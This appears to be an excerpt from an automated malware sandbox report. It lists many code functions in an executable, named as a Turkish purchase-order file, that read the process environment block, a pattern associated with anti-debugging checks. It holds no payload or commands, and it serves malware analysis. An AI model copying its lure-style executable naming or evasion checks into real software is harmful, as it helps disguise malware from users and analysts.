Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190260B mov eax, dword ptr fs:[00000030h] 3_2_0190260B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190260B mov eax, dword ptr fs:[00000030h] 3_2_0190260B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190260B mov eax, dword ptr fs:[00000030h] 3_2_0190260B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190260B mov eax, dword ptr fs:[00000030h] 3_2_0190260B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190260B mov eax, dword ptr fs:[00000030h] 3_2_0190260B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190260B mov eax, dword ptr fs:[00000030h] 3_2_0190260B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190260B mov eax, dword ptr fs:[00000030h] 3_2_0190260B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196E609 mov eax, dword ptr fs:[00000030h] 3_2_0196E609
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F262C mov eax, dword ptr fs:[00000030h] 3_2_018F262C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01926620 mov eax, dword ptr fs:[00000030h] 3_2_01926620
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01928620 mov eax, dword ptr fs:[00000030h] 3_2_01928620
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190E627 mov eax, dword ptr fs:[00000030h] 3_2_0190E627
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190C640 mov eax, dword ptr fs:[00000030h] 3_2_0190C640
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01922674 mov eax, dword ptr fs:[00000030h] 3_2_01922674
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192A660 mov eax, dword ptr fs:[00000030h] 3_2_0192A660
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192A660 mov eax, dword ptr fs:[00000030h] 3_2_0192A660
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B866E mov eax, dword ptr fs:[00000030h] 3_2_019B866E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B866E mov eax, dword ptr fs:[00000030h] 3_2_019B866E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F09AD mov eax, dword ptr fs:[00000030h] 3_2_018F09AD
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F09AD mov eax, dword ptr fs:[00000030h] 3_2_018F09AD
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019789B3 mov esi, dword ptr fs:[00000030h] 3_2_019789B3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019789B3 mov eax, dword ptr fs:[00000030h] 3_2_019789B3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019789B3 mov eax, dword ptr fs:[00000030h] 3_2_019789B3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h] 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h] 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h] 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h] 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h] 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h] 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h] 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h] 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h] 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h] 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h] 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h] 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h] 3_2_019029A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019249D0 mov eax, dword ptr fs:[00000030h] 3_2_019249D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BA9D3 mov eax, dword ptr fs:[00000030h] 3_2_019BA9D3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019869C0 mov eax, dword ptr fs:[00000030h] 3_2_019869C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA9D0 mov eax, dword ptr fs:[00000030h] 3_2_018FA9D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA9D0 mov eax, dword ptr fs:[00000030h] 3_2_018FA9D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA9D0 mov eax, dword ptr fs:[00000030h] 3_2_018FA9D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA9D0 mov eax, dword ptr fs:[00000030h] 3_2_018FA9D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA9D0 mov eax, dword ptr fs:[00000030h] 3_2_018FA9D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA9D0 mov eax, dword ptr fs:[00000030h] 3_2_018FA9D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019229F9 mov eax, dword ptr fs:[00000030h] 3_2_019229F9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019229F9 mov eax, dword ptr fs:[00000030h] 3_2_019229F9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197E9E0 mov eax, dword ptr fs:[00000030h] 3_2_0197E9E0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197C912 mov eax, dword ptr fs:[00000030h] 3_2_0197C912
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018E8918 mov eax, dword ptr fs:[00000030h] 3_2_018E8918
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018E8918 mov eax, dword ptr fs:[00000030h] 3_2_018E8918
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196E908 mov eax, dword ptr fs:[00000030h] 3_2_0196E908
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196E908 mov eax, dword ptr fs:[00000030h] 3_2_0196E908
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0198892B mov eax, dword ptr fs:[00000030h] 3_2_0198892B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197892A mov eax, dword ptr fs:[00000030h] 3_2_0197892A
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01970946 mov eax, dword ptr fs:[00000030h] 3_2_01970946
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C4940 mov eax, dword ptr fs:[00000030h] 3_2_019C4940
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01994978 mov eax, dword ptr fs:[00000030h] 3_2_01994978
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01994978 mov eax, dword ptr fs:[00000030h] 3_2_01994978
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197C97C mov eax, dword ptr fs:[00000030h] 3_2_0197C97C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01916962 mov eax, dword ptr fs:[00000030h] 3_2_01916962
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01916962 mov eax, dword ptr fs:[00000030h] 3_2_01916962
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01916962 mov eax, dword ptr fs:[00000030h] 3_2_01916962
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0193096E mov eax, dword ptr fs:[00000030h] 3_2_0193096E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0193096E mov edx, dword ptr fs:[00000030h] 3_2_0193096E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0193096E mov eax, dword ptr fs:[00000030h] 3_2_0193096E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F0887 mov eax, dword ptr fs:[00000030h] 3_2_018F0887
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197C89D mov eax, dword ptr fs:[00000030h] 3_2_0197C89D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E8C0 mov eax, dword ptr fs:[00000030h] 3_2_0191E8C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C08C0 mov eax, dword ptr fs:[00000030h] 3_2_019C08C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192C8F9 mov eax, dword ptr fs:[00000030h] 3_2_0192C8F9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192C8F9 mov eax, dword ptr fs:[00000030h] 3_2_0192C8F9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BA8E4 mov eax, dword ptr fs:[00000030h] 3_2_019BA8E4
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197C810 mov eax, dword ptr fs:[00000030h] 3_2_0197C810
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192A830 mov eax, dword ptr fs:[00000030h] 3_2_0192A830
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199483A mov eax, dword ptr fs:[00000030h] 3_2_0199483A
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199483A mov eax, dword ptr fs:[00000030h] 3_2_0199483A
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01912835 mov eax, dword ptr fs:[00000030h] 3_2_01912835
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01912835 mov eax, dword ptr fs:[00000030h] 3_2_01912835
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01912835 mov eax, dword ptr fs:[00000030h] 3_2_01912835
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01912835 mov ecx, dword ptr fs:[00000030h] 3_2_01912835
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01912835 mov eax, dword ptr fs:[00000030h] 3_2_01912835
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01912835 mov eax, dword ptr fs:[00000030h] 3_2_01912835
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01920854 mov eax, dword ptr fs:[00000030h] 3_2_01920854
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01902840 mov ecx, dword ptr fs:[00000030h] 3_2_01902840
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F4859 mov eax, dword ptr fs:[00000030h] 3_2_018F4859
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F4859 mov eax, dword ptr fs:[00000030h] 3_2_018F4859
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197E872 mov eax, dword ptr fs:[00000030h] 3_2_0197E872
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197E872 mov eax, dword ptr fs:[00000030h] 3_2_0197E872
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01986870 mov eax, dword ptr fs:[00000030h] 3_2_01986870
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01986870 mov eax, dword ptr fs:[00000030h] 3_2_01986870
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A4BB0 mov eax, dword ptr fs:[00000030h] 3_2_019A4BB0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A4BB0 mov eax, dword ptr fs:[00000030h] 3_2_019A4BB0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900BBE mov eax, dword ptr fs:[00000030h] 3_2_01900BBE
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900BBE mov eax, dword ptr fs:[00000030h] 3_2_01900BBE
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F0BCD mov eax, dword ptr fs:[00000030h] 3_2_018F0BCD
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F0BCD mov eax, dword ptr fs:[00000030h] 3_2_018F0BCD
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F0BCD mov eax, dword ptr fs:[00000030h] 3_2_018F0BCD
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199EBD0 mov eax, dword ptr fs:[00000030h] 3_2_0199EBD0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01910BCB mov eax, dword ptr fs:[00000030h] 3_2_01910BCB
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01910BCB mov eax, dword ptr fs:[00000030h] 3_2_01910BCB
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01910BCB mov eax, dword ptr fs:[00000030h] 3_2_01910BCB
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197CBF0 mov eax, dword ptr fs:[00000030h] 3_2_0197CBF0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191EBFC mov eax, dword ptr fs:[00000030h] 3_2_0191EBFC
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F8BF0 mov eax, dword ptr fs:[00000030h] 3_2_018F8BF0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F8BF0 mov eax, dword ptr fs:[00000030h] 3_2_018F8BF0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F8BF0 mov eax, dword ptr fs:[00000030h] 3_2_018F8BF0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h] 3_2_0196EB1D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h] 3_2_0196EB1D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h] 3_2_0196EB1D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h] 3_2_0196EB1D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h] 3_2_0196EB1D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h] 3_2_0196EB1D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h] 3_2_0196EB1D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h] 3_2_0196EB1D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h] 3_2_0196EB1D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C4B00 mov eax, dword ptr fs:[00000030h] 3_2_019C4B00
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191EB20 mov eax, dword ptr fs:[00000030h] 3_2_0191EB20
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191EB20 mov eax, dword ptr fs:[00000030h] 3_2_0191EB20
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B8B28 mov eax, dword ptr fs:[00000030h] 3_2_019B8B28
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B8B28 mov eax, dword ptr fs:[00000030h] 3_2_019B8B28
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199EB50 mov eax, dword ptr fs:[00000030h] 3_2_0199EB50
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C2B57 mov eax, dword ptr fs:[00000030h] 3_2_019C2B57
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C2B57 mov eax, dword ptr fs:[00000030h] 3_2_019C2B57
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C2B57 mov eax, dword ptr fs:[00000030h] 3_2_019C2B57
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C2B57 mov eax, dword ptr fs:[00000030h] 3_2_019C2B57
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A4B4B mov eax, dword ptr fs:[00000030h] 3_2_019A4B4B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A4B4B mov eax, dword ptr fs:[00000030h] 3_2_019A4B4B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01986B40 mov eax, dword ptr fs:[00000030h] 3_2_01986B40
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01986B40 mov eax, dword ptr fs:[00000030h] 3_2_01986B40
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BAB40 mov eax, dword ptr fs:[00000030h] 3_2_019BAB40
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01998B42 mov eax, dword ptr fs:[00000030h] 3_2_01998B42
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018E8B50 mov eax, dword ptr fs:[00000030h] 3_2_018E8B50
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018ECB7E mov eax, dword ptr fs:[00000030h] 3_2_018ECB7E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01928A90 mov edx, dword ptr fs:[00000030h] 3_2_01928A90
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h] 3_2_018FEA80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h] 3_2_018FEA80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h] 3_2_018FEA80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h] 3_2_018FEA80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h] 3_2_018FEA80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h] 3_2_018FEA80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h] 3_2_018FEA80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h] 3_2_018FEA80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h] 3_2_018FEA80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C4A80 mov eax, dword ptr fs:[00000030h] 3_2_019C4A80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F8AA0 mov eax, dword ptr fs:[00000030h] 3_2_018F8AA0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F8AA0 mov eax, dword ptr fs:[00000030h] 3_2_018F8AA0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01946AA4 mov eax, dword ptr fs:[00000030h] 3_2_01946AA4
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01924AD0 mov eax, dword ptr fs:[00000030h] 3_2_01924AD0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01924AD0 mov eax, dword ptr fs:[00000030h] 3_2_01924AD0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01946ACC mov eax, dword ptr fs:[00000030h] 3_2_01946ACC
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01946ACC mov eax, dword ptr fs:[00000030h] 3_2_01946ACC
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01946ACC mov eax, dword ptr fs:[00000030h] 3_2_01946ACC
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F0AD0 mov eax, dword ptr fs:[00000030h] 3_2_018F0AD0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192AAEE mov eax, dword ptr fs:[00000030h] 3_2_0192AAEE
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192AAEE mov eax, dword ptr fs:[00000030h] 3_2_0192AAEE
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197CA11 mov eax, dword ptr fs:[00000030h] 3_2_0197CA11
